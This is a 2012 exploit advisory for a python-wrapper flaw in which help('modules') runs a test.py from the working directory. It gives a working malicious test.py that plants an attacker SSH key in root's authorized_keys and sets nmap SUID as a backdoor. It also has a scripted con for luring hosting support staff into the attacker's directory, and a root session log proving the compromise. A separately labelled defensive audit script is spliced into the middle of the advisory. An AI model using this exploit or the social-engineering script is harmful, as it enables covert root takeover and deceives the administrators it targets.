# Title : python-wrapper Untrusted Search Path/Code Execution Vulnerability
# Published : 2012-07-02

# python-wrapper untrusted search path/code execution vulnerability
# Python-wrapper executes any test.py script within the current working directory when supplied with help('modules').
# A non-privileged user may gain code execution by tricking root into running help('modules'), or help() and then modules, from within python-wrapper
# while inside the non-privileged user's working directory.
# The evil file MUST be titled test.py! os.system("evilcommand") will result in python-wrapper executing said command and then continuing normally,
# with no signs of compromise if you redirect command output. os.system("/bin/echo ssh-rsa yourkey yourkeycomment >> /root/.ssh/authorized_keys") does not
# work; however, os.system("/bin/echo $(echo ssh-rsa yourkey yourkeycomment >> /root/.ssh/authorized_keys)") does.
# Additionally, nmap makes a great backdoor from a non-privileged user account because it's something that looks like you might actually
# want SETUID under certain circumstances, but not really (and it will bitch if invoked). In nmap 5.31DC1 the most useful switch (--interactive) was removed,
# which previously allowed you to bang out a shell (!/bin/csh, but not bash). Thank you David/Juan Carlos Castro for breaking one of my favorites.
# NOW, however, there is the nmap scripting engine to exploit. As usual, the input-output commands will behave like any exploitable SETUID program
# with input-output commands.
# A practical example of how this vulnerability could be useful is if you wish to attack a shared web hosting environment.
# After convincing root (support) to cd into your directory, perhaps by uploading a broken "distraction.py" and getting him to troubleshoot it,
# you could pose the question: "Hey, what python modules do you guys have installed?" "I'm not quite sure how to list that..."
# "You can list the modules installed by entering python-wrapper and typing help('modules')" "Oh!" *silent test.py execution by root*
# "There's a lot of them... would you like them as an email attachment?" "Yeah, thanks. I think I'll look at that and try troubleshooting this more myself."
# - ShadowHatesYou (Shadow@SquatThis.net)
# 6/30/12
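As an added, defender-side example (not part of the advisory and not python-wrapper's own code; written for Python 3, whereas the advisory's session is Python 2.7.3): the script below audits the condition the attack relies on, namely that the interactive interpreter puts the working directory ('' at sys.path[0]) ahead of the library, so a file such as test.py in that directory shadows the library module of the same name for whichever import pulls it in. It lists the names in a directory that shadow real modules and builds a sys.path with the working-directory entries removed; the test.py, json.py and harmless.py it creates are constructed stand-ins with no side effects.

```python
import os
import sys
import tempfile
from importlib.machinery import PathFinder

def cwd_entries(path_list, cwd=None):
    """Indices of path_list entries that resolve to the working directory.
    The interactive interpreter puts '' (the cwd) first on sys.path, which is
    how a test.py in the cwd gets picked over the library module of that name."""
    cwd = os.path.abspath(cwd or os.getcwd())
    return [i for i, p in enumerate(path_list)
            if p in ("", ".") or os.path.abspath(p) == cwd]

def shadowed_modules(directory, path_list=None):
    """Map each importable name in directory to the library module it shadows;
    only names that also resolve elsewhere on path_list are reported."""
    directory = os.path.abspath(directory)
    others = [p for p in (path_list or sys.path)
              if p and os.path.abspath(p) != directory]
    names = set()
    for fn in os.listdir(directory):
        if fn.endswith(".py") and fn != "__init__.py":
            names.add(fn[:-3])
        elif os.path.isfile(os.path.join(directory, fn, "__init__.py")):
            names.add(fn)
    shadowed = {}
    for name in sorted(names):
        spec = PathFinder.find_spec(name, others)
        if name in sys.builtin_module_names:
            shadowed[name] = "built-in"
        elif spec is not None:
            shadowed[name] = spec.origin or "namespace package"
    return shadowed

def hardened_path(path_list, cwd=None):
    """path_list with the working-directory entries removed; assign the result
    to sys.path before calling help() from a directory you do not own."""
    drop = set(cwd_entries(path_list, cwd))
    return [p for i, p in enumerate(path_list) if i not in drop]

def demo():
    """Audit a constructed directory laid out like the advisory's (benign stand-ins)."""
    work = tempfile.mkdtemp()
    for fn in ("test.py", "json.py", "harmless.py"):  # constructed files, no side effects
        with open(os.path.join(work, fn), "w") as f:
            f.write("RAN = True\n")
    repl_path = [""] + [p for p in sys.path if p]  # sys.path as the REPL orders it
    return {"cwd_on_path": cwd_entries(repl_path, work),
            "shadowed": shadowed_modules(work),
            "hardened": hardened_path(repl_path, work)}
```

On Python 3.11 and later, starting the interpreter with -P or with PYTHONSAFEPATH set leaves the working directory off sys.path from the start; the advisory's Python 2.7.3 has no such switch, so the manual path fix above is the equivalent there.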

root@tourian:/home/shadow/python# ls -hl test.py
-rw-r--r-- 1 shadow shadow 137 Jun 30 13:06 test.py
root@tourian:/home/shadow/python# cat test.py
import os
os.system('/bin/echo $(echo "ssh-rss pwned byshadow" >> /root/.ssh/authorized_keys); chmod 4755 /usr/bin/nmap')

root@tourian:/home/shadow/python# ls -hl /usr/bin/nmap
-rwxr-xr-x 1 root root 1.9M Jun 30 13:06 /usr/bin/nmap
root@tourian:/home/shadow/python# ls -hl /root/.ssh/authorized_keys
ls: cannot access /root/.ssh/authorized_keys: No such file or directory
root@tourian:/home/shadow/python# python-wrapper
Python 2.7.3 (default, May  4 2012, 00:13:26)
[GCC 4.6.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> help('modules')

Please wait a moment while I gather a list of all available modules...

ArgImagePlugin      _bisect             email               pprint
BaseHTTPServer      _codecs             encodings           pptransport
Bastion             _codecs_cn          errno               ppworker
BdfFontFile         _codecs_hk          exceptions          profile
BeautifulSoup       _codecs_iso2022     fcntl               pstats
BeautifulSoupTests  _codecs_jp          filecmp             pty
BitTornado          _codecs_kr          fileinput           pwd
BmpImagePlugin      _codecs_tw          fnmatch             py_compile
BufrStubImagePlugin _collections        formatter           pyclbr
CDROM               _cracklib           fpformat            pydoc
CGIHTTPServer       _csv                fractions           pydoc_data
ConfigParser        _ctypes             ftplib              pyexpat
ContainerIO         _ctypes_test        functools           pyrit_cli
Cookie              _curses             future_builtins     pyximport
Crypto              _curses_panel       gamin               quopri
CurImagePlugin      _elementtree        gc                  random
Cython              _emerge             gdbm                re
DLFCN               _functools          genericpath         readline
DcxImagePlugin      _gamin              gentoolkit          repoman
DocXMLRPCServer     _gv                 getopt              repr
EpsImagePlugin      _hashlib            getpass             resource
ExifTags            _heapq              gettext             rexec
FitsStubImagePlugin _hotshot            git_remote_helpers  rfc822
FliImagePlugin      _imaging            glob                rlcompleter
FontFile            _imagingft          grp                 robotparser
FpxImagePlugin      _imagingmath        gv                  rrdtool
GbrImagePlugin      _io                 gzip                runpy
GdImageFile         _json               hashlib             scapy
GifImagePlugin      _lcms               heapq               sched
GimpGradientFile    _ldns               hmac                scipy
GimpPaletteFile     _locale             hotshot             select
GribStubImagePlugin _lsprof             htmlentitydefs      sets
HTMLParser          _md5                htmllib             setuptools
Hdf5StubImagePlugin _multibytecodec     httplib             sgmllib
IN                  _multiprocessing    ihooks              sha
IcnsImagePlugin     _pyio               imaplib             shelve
IcoImagePlugin      _random             imghdr              shlex
ImImagePlugin       _sha                imp                 shutil
Image               _sha256             importlib           signal
ImageChops          _sha512             imputil             site
ImageCms            _socket             inspect             smtpd
ImageColor          _sre                io                  smtplib
ImageDraw           _ssl                itertools           sndhdr
ImageDraw2          _strptime           java_config_2       socket
ImageEnhance        _struct             javatoolkit         spwd
ImageFile           _symtable           json                sre
ImageFileIO         _testcapi           keyword             sre_compile
ImageFilter         _threading_local    lcms                sre_constants
ImageFont           _unbound            ldns                sre_parse
ImageGL             _warnings           ldnsx               ssl
ImageGrab           _weakref            lib2to3             stat
ImageMath           _weakrefset         libsvn              statvfs
ImageMode           _xmlplus            libxml2             string
ImageOps            abc                 libxml2mod          stringold
ImagePalette        aifc                libxslt             stringprep
ImagePath           antigravity         libxsltmod          strop
ImageQt             anydbm              linecache           struct
ImageSequence       argparse            linuxaudiodev       subprocess
ImageShow           array               locale              sunau
ImageStat           ast                 logging             sunaudio
ImageTk             asynchat            lxml                svn
ImageTransform      asyncore            macpath             symbol
ImageWin            atexit              macurl2path         symtable
ImtImagePlugin      audiodev            magic               sys
IptcImagePlugin     audioop             mailbox             sysconfig
JpegImagePlugin     base64              mailcap             syslog
McIdasImagePlugin   bdb                 markupbase          tabnanny
MicImagePlugin      binascii            marshal             tarfile
MimeWriter          binhex              math                telnetlib
MpegImagePlugin     bisect              md5                 tempfile
MspImagePlugin      bs4                 mhlib               termios
OleFileIO           bz2                 mimetools           test
OpenIPMI            cPickle             mimetypes           textwrap
PAM                 cProfile            mimify              this
PIL                 cStringIO           mirrorselect        thread
PSDraw              calendar            mmap                threading
PaletteFile         cgi                 modulefinder        time
PalmImagePlugin     cgitb               multifile           timeit
PcdImagePlugin      chunk               multiprocessing     toaiff
PcfFontFile         cmath               mutex               token
PcxImagePlugin      cmd                 netrc               tokenize
PdfImagePlugin      code                netsnmp             trace
PixarImagePlugin    codecs              new                 traceback
PngImagePlugin      codeop              nis                 tty
PpmImagePlugin      collections         nntplib             types
PsdImagePlugin      colorsys            ntpath              unbound
Queue               commands            nturl2path          unboundmodule
SgiImagePlugin      compileall          numbers             unicodedata
SimpleHTTPServer    compiler            numpy               unittest
SimpleXMLRPCServer  contextlib          opcode              urllib
SocketServer        cookielib           operator            urllib2
SpiderImagePlugin   copy                optparse            urlparse
StringIO            copy_reg            os                  user
SunImagePlugin      cpyrit              os2emxpath          uu
TYPES               cracklib            ossaudiodev         uuid
TarIO               crypt               paramiko            warnings
TiffImagePlugin     ctypes              pdb                 weakref
TiffTags            curses              pickle              webbrowser
UserDict            cython              pickletools         whichdb
UserList            datetime            pipes               wsgiref
UserString          dbm                 pkg_resources       xattr
WalImageFile        decimal             pkgutil             xcbgen
WmfImagePlugin      difflib             platform            xdelta3main
XVThumbImagePlugin  dircache            plistlib            xdrlib
XbmImagePlugin      dis                 popen2              xen
XpmImagePlugin      distutils           poplib              xml
_LWPCookieJar       dnet                portage             xmllib
_MozillaCookieJar   doctest             posix               xmlrpclib
_OpenIPMI           drv_libxml2         posixfile           xxsubtype
__builtin__         dumbdbm             posixpath           yasm
__future__          dummy_thread        pp                  zipfile
_abcoll             dummy_threading     ppauto              zipimport
_ast                easy_install        ppcommon            zlib

Enter any module name to get more help.  Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".

>>> quit()
root@tourian:/home/shadow/python# ls -hl /usr/bin/nmap
-rwsr-xr-x 1 root root 1.9M Jun 30 13:06 /usr/bin/nmap
root@tourian:/home/shadow/python# cat /root/.ssh/authorized_keys
ssh-rss pwned byshadow

# Wish I had DuoSecurity!
# See you at Defcon!